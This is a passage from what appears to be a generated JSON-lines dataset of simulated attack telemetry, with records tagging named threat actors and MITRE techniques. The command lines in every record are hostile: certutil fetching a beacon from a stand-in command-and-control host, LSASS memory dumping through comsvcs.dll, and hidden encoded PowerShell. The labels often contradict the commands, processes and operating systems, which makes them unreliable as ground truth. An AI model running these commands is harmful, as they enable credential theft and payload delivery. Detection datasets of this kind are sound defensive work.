aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-09-07T06:58:00.000Z","user":{"name":"arn:aws:iam::pn2x6is1ur9v","sid":"S-1-5-21-628671019-205464519-9851"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Privilege Escalation","Discovery","Credential Access"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20260618T103219000Z_0018295","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.96.50.184","name":"APP-WEB-PZAAWBHNZU","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18295UNC4841T1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.56.218.25","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-03-10T02:15:25.000Z","user":{"name":"svc_i6uoqfm89rew","sid":"S-1-5-21-698654205-332089320-9642"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Discovery"],"technique_id":"T1570"},"event_id":"evt_mustangpanda_20250223T054322000Z_0018297","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.3.192.243","name":"DB-ORACLE-S2AGFAP3ZJ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18297Mustang PandaT1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.61.80.25","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2672 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-10-31T22:00:57.000Z","user":{"name":"svc_46c4sv81zb80","sid":"S-1-5-21-929983243-569769210-4247"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Persistence"],"technique_id":"T1003.001"},"event_id":"evt_fin7_20250726T104622000Z_0018299","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.184.152.28","name":"IAM-ROLE-5SLRHRN7KF","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18299FIN7T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.172.113.148","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-11-13T13:22:37.000Z","user":{"name":"i-udb5azpew0g3","sid":"S-1-5-21-792016296-197401913-8877"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Credential Access"],"technique_id":"T1059.001"},"event_id":"evt_apt29_20250228T161334000Z_0018301","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.120.233.170","name":"AZURE-VM-K0D3GWSRQS","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18301APT29T1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.183.163.90","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-03-13T18:01:10.000Z","user":{"name":"CORP\\c8sjwvdn7o1u","sid":"S-1-5-21-794096671-963852387-2179"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Exfiltration"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20250706T191020000Z_0018303","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.48.87.235","name":"EC2-INST-9ITNBGPO90","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18303APT41T1566.001"},"network":{"domain":"github.com","dst_ip":"1.140.90.121","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-03-10T08:54:45.000Z","user":{"name":"CORP\\0prqw1znu471","sid":"S-1-5-21-734568271-557338954-2562"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Command and Control","Exfiltration","Impact"],"technique_id":"T1570"},"event_id":"evt_lapsus_20251229T122311000Z_0018305","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.207.72.66","name":"WIN-FIN-SRV-GMR5MO7S0L","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18305Lapsus$T1570"},"network":{"domain":"github.com","dst_ip":"1.60.27.47","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-12-06T15:09:09.000Z","user":{"name":"arn:aws:iam::5x7ck97an2pr","sid":"S-1-5-21-985958686-516157370-3408"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Execution","Defense Evasion","Reconnaissance"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20251004T043433000Z_0018307","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.16.192.44","name":"AZURE-VM-SDM2RD5WAR","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18307FIN7T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.166.60.171","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-01-08T20:36:52.000Z","user":{"name":"svc_hnagv6u2swkh","sid":"S-1-5-21-430494810-466814250-2806"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Discovery","Command and Control","Collection"],"technique_id":"T1071.001"},"event_id":"evt_apt29_20250913T043056000Z_0018309","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.255.89.229","name":"WIN-FIN-SRV-AM6PANLSZT","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18309APT29T1071.001"},"network":{"domain":"github.com","dst_ip":"1.192.240.168","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-08-29T05:08:13.000Z","user":{"name":"CORP\\oq0swqsp0y0d","sid":"S-1-5-21-819326425-196488603-1074"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Privilege Escalation","Persistence","Impact"],"technique_id":"T1531"},"event_id":"evt_mustangpanda_20250928T012745000Z_0018311","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.215.115.197","name":"EC2-INST-E0QKTXRZQ3","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18311Mustang PandaT1531"},"network":{"domain":"github.com","dst_ip":"1.62.125.140","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-06-09T16:39:53.000Z","user":{"name":"svc_kofu4zb6qym3","sid":"S-1-5-21-746237250-508644322-2791"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Persistence"],"technique_id":"T1003.001"},"event_id":"evt_apt29_20251009T090931000Z_0018313","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.123.227.227","name":"IAM-ROLE-0CAFWP2W5T","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18313APT29T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.47.85.224","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-05-06T08:01:30.000Z","user":{"name":"azuread\\d70eihcijmgg","sid":"S-1-5-21-817577352-235981264-7821"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Credential Access","Command and Control","Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20251019T001156000Z_0018315","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.113.212.38","name":"WIN-FIN-SRV-CP2UZPSZ0Q","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18315Volt TyphoonT1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.69.51.135","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2493 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-09-25T22:49:59.000Z","user":{"name":"CORP\\xtiejziuxl3e","sid":"S-1-5-21-755737101-302253603-6379"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Initial Access","Command and Control","Collection"],"technique_id":"T1098.004"},"event_id":"evt_volttyphoon_20250926T233553000Z_0018317","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.245.203.131","name":"WIN-FIN-SRV-P1SJ3O927N","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18317Volt TyphoonT1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.142.137.148","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1222 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-09-21T23:41:37.000Z","user":{"name":"azuread\\kvw64vwfxsxl","sid":"S-1-5-21-998940160-787681898-2348"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Impact","Execution","Collection"],"technique_id":"T1071.001"},"event_id":"evt_volttyphoon_20260711T022242000Z_0018319","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.49.68.185","name":"AZURE-VM-524EWJVGSF","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18319Volt TyphoonT1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.125.188.11","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1666 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-11-30T04:42:01.000Z","user":{"name":"CORP\\z0p3ryv83id0","sid":"S-1-5-21-807148696-376652681-4151"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Collection"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20261029T213407000Z_0018321","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.43.152.205","name":"IAM-ROLE-QHFJVW8CUE","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18321FIN7T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.93.196.245","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-11-21T06:58:19.000Z","user":{"name":"svc_f5ggxyk318w4","sid":"S-1-5-21-812664404-471237513-7889"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Privilege Escalation","Persistence","Impact"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20250908T142304000Z_0018323","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.174.104.94","name":"APP-WEB-5ZGHI8XBJ3","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18323Scattered SpiderT1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.114.76.124","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-03-19T17:45:30.000Z","user":{"name":"svc_tt2z8hpz6k7y","sid":"S-1-5-21-980108862-379768391-7183"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Command and Control","Collection","Defense Evasion"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20260223T062624000Z_0018325","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.85.251.18","name":"APP-WEB-IXT3PP0MG1","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18325APT29T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.164.236.95","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-11-09T19:49:43.000Z","user":{"name":"svc_abjhjwnuwgf6","sid":"S-1-5-21-163497569-752912500-9458"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Credential Access","Discovery","Exfiltration"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20260503T070753000Z_0018327","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.218.156.90","name":"DB-ORACLE-Y0GQNUNDK1","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18327Lapsus$T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.33.114.230","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-01-19T21:56:07.000Z","user":{"name":"i-7kjf59j9h3yo","sid":"S-1-5-21-196278039-203064839-1542"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Lateral Movement"],"technique_id":"T1546.003"},"event_id":"evt_mustangpanda_20261012T132544000Z_0018329","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.218.19.117","name":"EC2-INST-3RSWMWWSNX","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18329Mustang PandaT1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.141.81.58","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3825 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-09-20T00:48:07.000Z","user":{"name":"svc_e8skoubcxdh4","sid":"S-1-5-21-566695253-223753471-5014"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Reconnaissance","Defense Evasion","Execution"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20260323T035004000Z_0018331","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.219.179.211","name":"APP-WEB-2NMGB18QCH","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18331Scattered SpiderT1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.4.253.129","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"wmic.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-06-22T00:24:05.000Z","user":{"name":"i-ji1dvurp9dup","sid":"S-1-5-21-586731735-416235556-7009"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Discovery","Persistence"],"technique_id":"T1484.001"},"event_id":"evt_apt41_20250421T045223000Z_0018333","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.168.212.193","name":"IAM-ROLE-KLENKRZPS6","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18333APT41T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.178.57.225","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2874 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-11-09T09:36:15.000Z","user":{"name":"i-5127gmvup5fs","sid":"S-1-5-21-707283454-988799090-5554"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Defense Evasion","Impact","Privilege Escalation"],"technique_id":"T1531"},"event_id":"evt_fin7_20260426T092017000Z_0018335","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.95.1.31","name":"WIN-FIN-SRV-NXHSELB6S0","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18335FIN7T1531"},"network":{"domain":"github.com","dst_ip":"1.153.78.72","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-04-24T18:13:54.000Z","user":{"name":"CORP\\2urx313eqbwf","sid":"S-1-5-21-331965605-585327291-9166"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Initial Access","Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20260708T133052000Z_0018337","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.210.82.111","name":"EC2-INST-3MZ1604W0E","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18337Volt TyphoonT1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.164.118.46","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-11-07T08:40:51.000Z","user":{"name":"arn:aws:iam::207mqer93q0i","sid":"S-1-5-21-832737760-374239495-3666"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Exfiltration","Impact"],"technique_id":"T1570"},"event_id":"evt_lapsus_20250509T224038000Z_0018339","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.200.116.20","name":"EC2-INST-8V4BYGLDJ5","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18339Lapsus$T1570"},"network":{"domain":"github.com","dst_ip":"1.143.202.31","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-09-04T09:08:16.000Z","user":{"name":"svc_4zv1u5gk4vw4","sid":"S-1-5-21-133332288-410342746-9786"}} |
